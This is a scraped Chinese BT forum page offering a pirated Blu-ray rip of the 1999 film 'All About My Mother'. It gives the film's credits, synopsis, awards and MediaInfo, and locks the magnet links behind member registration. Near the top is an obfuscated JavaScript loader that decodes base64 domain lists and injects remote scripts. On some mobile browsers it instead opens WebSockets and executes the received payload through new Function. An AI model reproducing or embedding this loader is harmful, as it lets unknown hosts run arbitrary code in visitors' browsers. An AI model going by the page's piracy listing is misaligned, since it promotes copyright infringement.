关于我母亲的一切[双语字幕].Todo.sobre.mi.madre.1999.1080p.迅雷下载 12.40GB

版主小s 1月前 329

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 关于我母亲的一切 / 论尽我阿妈(港) / 我的母亲(台) / All About My Mother

◎片 名 Todo sobre mi madre

◎年 代 1999

◎产 地 西班牙 / 法国

◎类 别 剧情

◎语 言 西班牙语 / 加泰罗尼亚语 / 英语

◎上映日期 1999-04-08(西班牙首映) / 1999-04-16(西班牙) / 1999-05-15(戛纳电影节) / 1999-05-19(法国)

◎IMDb链接 https://www.imdb.com/title/tt0185125/

◎豆瓣评分 8.5/10 (53195人评价)

◎豆瓣链接 https://movie.douban.com/subject/1291937/

◎片 长 101分钟

◎导 演 佩德罗·阿莫多瓦 Pedro Almodóvar (id:1056071)

◎编 剧 佩德罗·阿莫多瓦 Pedro Almodóvar (id:1056071)

◎演 员 塞西莉亚·罗特 Cecilia Roth (id:1022950)

玛丽萨·帕雷德斯 Marisa Paredes (id:1002839)

坎德拉·佩尼亚 Candela Pe?a (id:1133452)

安东尼亚·圣胡安 Antonia San Juan (id:1000674)

佩内洛普·克鲁兹 Penélope Cruz (id:1005774)

罗莎·玛丽亚·萨尔达 Rosa Maria Sardà (id:1055453)

费尔南多·费尔南·戈麦斯 Fernando Fernán Gómez (id:1054370)

托尼·坎托 Toni Cantó (id:1067788)

埃罗·阿索林 Eloy Azorín (id:1005344)

卡洛斯·洛萨诺 Carlos Lozano (id:1125974)

费尔南多·古林 Fernando Guillén (id:1100575)

曼努埃尔·莫龙 Manuel Morón (id:1127231)

乔斯·路易斯·托里霍 José Luis Torrijo (id:1334380)

胡安·乔斯·奥特圭 Juan José Otegui (id:1136134)

卡门·巴拉格 Carmen Balagué (id:1058562)

埃丝特·加西亚 Esther García (id:1284528)

阿古斯丁·阿莫多瓦 Agustín Almodóvar (id:1277067)

阿古斯丁·阿莫多瓦 Agustín Almodóvar (id:1277067)

阿尔维托·伊格莱西亚斯 Alberto Iglesias (id:1287288)

何塞·萨尔赛多 José Salcedo (id:1296497)

安特松·戈麦斯 Antxón Gómez (id:1285718)

费德里克·康贝罗 Federico G. Cambero (id:1279929)

佩纳·戴格勒 Bina Daigeler (id:1281725)

约斯·科西欧 José María De Cossío (id:1281990)

约戈·埃尔南德斯 Jorge Hernández (id:1286496)

简·赫尔南德斯 Juan Pedro Hernández (id:1286500)

◎标 签 西班牙 / 女性 / 剧情 / 1999 / 文艺 / 人性 / 法国 / 女权

◎简 介

玛努埃拉(丝莉亚洛芙饰)的丈夫在儿子出生前就离开了妻子,玛努埃拉成为了单身妈妈,带着儿子埃斯特班来到马德里生活。儿子从不知道爸爸的事情,玛努埃拉只好对儿子说父亲已经过世。然而,儿子终究不相信。他在日记本里悄悄写下对父亲的想念。

车祸来得那么突然,儿子被一辆迎面撞来的汽车夺走了生命。母亲悲伤不已,决定去找孩子的父亲洛拉,完成儿子心愿。然而她却得知,洛拉已经换装成女人,当了妓女,而且染上了艾滋病。更不幸的是,修女罗萨(佩内洛普饰)怀上了洛拉的孩子。玛努埃拉留在罗萨身边照顾她,罗萨诞下的婴儿也取自己儿子埃斯特班的名字,苦难的日子终于有了希望--这个新生儿竟然逃过了艾滋的噩运。

◎获奖情况 (共8项)

第72届奥斯卡金像奖 (2000)

最佳外语片

└──佩德罗·阿莫多瓦 (id:1056071)

第52届戛纳电影节 (1999)

主竞赛单元 金棕榈奖(提名)

└──佩德罗·阿莫多瓦 (id:1056071)

主竞赛单元 最佳导演

└──佩德罗·阿莫多瓦 (id:1056071)

天主教人道精神奖

└──佩德罗·阿莫多瓦 (id:1056071)

第57届金球奖 (2000)

电影类 最佳外语片

第53届英国电影学院奖 (2000)

电影奖 最佳导演

└──佩德罗·阿莫多瓦 (id:1056071)

电影奖 最佳原创剧本(提名)

└──佩德罗·阿莫多瓦 (id:1056071)

电影奖 最佳非英语片

└──阿古斯丁·阿莫多瓦 (id:1277067)

└──佩德罗·阿莫多瓦 (id:1056071)

  1. General

  2. Unique ID : 29760109807813288594508663161844197573 (0x166396B299785CDEA4C033CD1F14E8C5)

  3. Complete name : Todo.sobre.mi.madre.1999.1080p.BluRay.x264.DTS-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 12.4 GiB

  7. Duration : 1 h 41 min

  8. Overall bit rate : 17.5 Mb/s

  9. Movie name : Todo sobre mi madre 1999

  10. Encoded date : UTC 2021-06-28 15:45:39

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 41 min

  25. Bit rate : 15.8 Mb/s

  26. Width : 1 920 pixels

  27. Height : 816 pixels

  28. Display aspect ratio : 2.35:1

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.422

  36. Stream size : 11.3 GiB (91%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=25 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.5000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Language : English

  40. Default : Yes

  41. Forced : No


  42. Audio

  43. ID : 2

  44. ID in the original source medium : 4352 (0x1100)

  45. Format : DTS

  46. Format/Info : Digital Theater Systems

  47. Codec ID : A_DTS

  48. Duration : 1 h 41 min

  49. Bit rate mode : Constant

  50. Bit rate : 1 509 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 24 bits

  56. Compression mode : Lossy

  57. Stream size : 1.07 GiB (9%)

  58. Language : Spanish

  59. Default : Yes

  60. Forced : No

  61. Original source medium : Blu-ray


  62. Text #1

  63. ID : 3

  64. ID in the original source medium : 4609 (0x1201)

  65. Format : PGS

  66. Muxing mode : zlib

  67. Codec ID : S_HDMV/PGS

  68. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  69. Duration : 1 h 36 min

  70. Bit rate : 63.9 kb/s

  71. Count of elements : 3151

  72. Stream size : 44.1 MiB (0%)

  73. Title : chs&eng

  74. Language : Chinese

  75. Default : Yes

  76. Forced : No

  77. Original source medium : Blu-ray


  78. Text #2

  79. ID : 4

  80. ID in the original source medium : 4610 (0x1202)

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 36 min

  86. Bit rate : 64.3 kb/s

  87. Count of elements : 3151

  88. Stream size : 44.4 MiB (0%)

  89. Title : cht&eng

  90. Language : Chinese

  91. Default : Yes

  92. Forced : No

  93. Original source medium : Blu-ray


  94. Text #3

  95. ID : 5

  96. ID in the original source medium : 4611 (0x1203)

  97. Format : PGS

  98. Muxing mode : zlib

  99. Codec ID : S_HDMV/PGS

  100. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  101. Duration : 1 h 36 min

  102. Bit rate : 35.8 kb/s

  103. Count of elements : 3151

  104. Stream size : 24.8 MiB (0%)

  105. Title : chs

  106. Language : Chinese

  107. Default : Yes

  108. Forced : No

  109. Original source medium : Blu-ray


  110. Text #4

  111. ID : 6

  112. ID in the original source medium : 4612 (0x1204)

  113. Format : PGS

  114. Muxing mode : zlib

  115. Codec ID : S_HDMV/PGS

  116. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration : 1 h 36 min

  118. Bit rate : 36.3 kb/s

  119. Count of elements : 3151

  120. Stream size : 25.1 MiB (0%)

  121. Title : cht

  122. Language : Chinese

  123. Default : Yes

  124. Forced : No

  125. Original source medium : Blu-ray


  126. Text #5

  127. ID : 7

  128. ID in the original source medium : 4608 (0x1200)

  129. Format : PGS

  130. Muxing mode : zlib

  131. Codec ID : S_HDMV/PGS

  132. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  133. Duration : 1 h 34 min

  134. Bit rate : 54.4 kb/s

  135. Count of elements : 2710

  136. Stream size : 36.8 MiB (0%)

  137. Language : English

  138. Default : Yes

  139. Forced : No

  140. Original source medium : Blu-ray


  141. Menu

  142. 00:00:00.000 : Chapter 01

  143. 00:08:31.802 : Chapter 02

  144. 00:15:21.086 : Chapter 03

  145. 00:19:41.430 : Chapter 04

  146. 00:29:01.906 : Chapter 05

  147. 00:36:44.827 : Chapter 06

  148. 00:46:11.185 : Chapter 07

  149. 00:51:44.643 : Chapter 08

  150. 01:09:55.941 : Chapter 09

  151. 01:16:28.500 : Chapter 10

  152. 01:20:57.936 : Chapter 11

  153. 01:33:43.117 : Chapter 12




此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 剧情

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖